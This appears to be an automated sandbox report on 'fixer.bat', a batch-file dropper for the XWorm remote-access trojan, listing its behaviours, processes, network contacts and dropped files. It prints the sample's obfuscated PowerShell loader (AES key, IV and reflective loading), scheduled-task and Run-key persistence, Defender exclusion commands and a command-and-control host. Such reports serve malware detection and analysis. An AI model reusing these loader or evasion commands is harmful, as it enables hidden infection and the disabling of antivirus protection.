Malware Analysis Report

2024-11-16 13:40

Sample ID 240601-j9s14sfc41
Target fixer.bat
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833

Threat Level: Known bad

The file fixer.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Drops startup file

Checks computer location settings

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Runs net.exe

Delays execution with timeout.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-01 08:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 08:22

Reported

2024-06-01 08:23

Platform

win10v2004-20240508-en

Max time kernel

37s

Max time network

38s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2468 wrote to memory of 4332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4332 wrote to memory of 4760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4332 wrote to memory of 4760 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2468 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2468 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2468 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 1904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4548 wrote to memory of 1904 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1904 wrote to memory of 3872 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1904 wrote to memory of 3872 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3872 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1304 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1304 wrote to memory of 2192 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3872 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3872 wrote to memory of 3512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3508 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 8 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 8 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3512 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3512 wrote to memory of 3316 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3316 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3316 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_9_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 movie-buddy.gl.at.ply.gg udp
US 147.185.221.16:40572 movie-buddy.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp

Files

memory/4548-0-0x00007FFA6C413000-0x00007FFA6C415000-memory.dmp

memory/4548-11-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

memory/4548-10-0x0000025DF7610000-0x0000025DF7632000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51143hyf.xux.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4548-12-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

memory/4548-13-0x0000025DF7A10000-0x0000025DF7A54000-memory.dmp

memory/4548-14-0x0000025DF7A60000-0x0000025DF7AD6000-memory.dmp

memory/4548-15-0x0000025DF54E0000-0x0000025DF54E8000-memory.dmp

memory/4548-16-0x0000025DF7600000-0x0000025DF7612000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3ffce848af907464c20a20e1b430f78a
SHA1 fbcd91a5c226d474235be920cf49e3344893fc1f
SHA256 25213a6685a6fd21a2aa43c417891703333579ad784f3896976b44bcfcdb009e
SHA512 1adaf6d68441a32b459b6071dcfdae404ab1e37bb0c6511e08d49717f9043679bdd7ca3324be184ece522e6516eedc04203ffccb5f9ea790bd35a84db9b944bf

C:\Users\Admin\AppData\Roaming\Windows_Log_9.vbs

MD5 a06f75c614ce265849e2dfa949e03993
SHA1 72bf7a3ee49244d9ae4fbf92542aef881c83c630
SHA256 09c05316992d7c9470baee97e2a90e7d6ba3f390646f610dd8409d499271d9c8
SHA512 d036970d3376a99c5c4302a8609ee37d7f5dd6e959b3abaa304e904af7a17e5b860678731aa0fd873e23ce8e55a36b876097bd59f32d66054a4d651f54209d41

C:\Users\Admin\AppData\Roaming\Windows_Log_9.bat

MD5 1e16a3b0237093cea53d9dff9593c17a
SHA1 4227feac46a1a00827029d784442ca250c3d27b1
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
SHA512 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 664dee2ab48c3453aa55cac8ecaa5a44
SHA1 9211491fa3bfb05ded40ac728c73e05ac7e2aca2
SHA256 a5d660246afdd69389db1f961d2d7fa69177d198cdbdc327218fde0ea68a4953
SHA512 dbeb4f57093348ec822e29c8cfd7d74ba0d2d7e26e7157f3fda18b2c3f05012513f1c4c06b2e2801429fa1e595e35dd7ba823c95570135f737f87ce3857fc4ff

memory/3512-46-0x000002C9F4990000-0x000002C9F49A2000-memory.dmp

memory/3512-47-0x000002C9F4A10000-0x000002C9F4A26000-memory.dmp

memory/4548-48-0x00007FFA6C410000-0x00007FFA6CED1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 00068d34580ca0b4e186c4a6f303b09e
SHA1 59fe7294b796d4848709b32042246f1bb73acfab
SHA256 68f5b87085e5d444e29c42f79d24740e03f6658edb8bd2230cce896aac871fa6
SHA512 96359172ef18684d8b81977a3d79246427ce0b328e160f2e8b548b338feb081817293b04593960f679915c42a5b86255b30f5b56d06318de8dcb4e77e9d277ea

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f3bc9dee8a80a73a256a69e26fe61c07
SHA1 bc546c10ce1b4cb47b89ea60498384f88f96fa5a
SHA256 3c7f3194722f46cb07885da576daf720a5133913b3fbce4a3ef8c8040028364d
SHA512 be2d861832db826ee67f03e6a9151dc6802481c3b5984ce457e43cebecd162f60460ccf7ac5893169d01eff77e2a863c5e323d68e07f2b1b3d6dab5884f7ac6a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 170815947c2c60cbba6d92dbaa5fcda0
SHA1 ee35a1efbeefb6f4d02b5998ead396927b2b3c3e
SHA256 c8b10f1af94f31c428461e0982d069316295482cc3642589f538ab5f163bbacb
SHA512 b077a95d1fe0308903e0b690c08c96f205485c7f31f355d8e8f8b545f587538d618bdff2d5e93ae97491b2a14a4b9ef79f619c2acf067018567b5e8167727a83

C:\Users\Admin\AppData\Local\Temp\tmpD9C6.tmp.bat

MD5 d649dd1277ab7c2278808ce9aab3103e
SHA1 b96c2425fb03c8fc44151f3ab0d0ae28a9d81029
SHA256 9aa57a271ddad7106f6d49815e88700f69e69056329f65799e82d6ec41bc23f9
SHA512 f182e5d21fb679eb06db5eb7339c1ab8cc8ad4b7c495a6fba48e095b2d178d253278a13fd026a40146cad35b0c112e12afde614fff40c10fb0ce7296712d62ff

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 08:22

Reported

2024-06-01 08:23

Platform

win11-20240426-en

Max time kernel

37s

Max time network

38s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
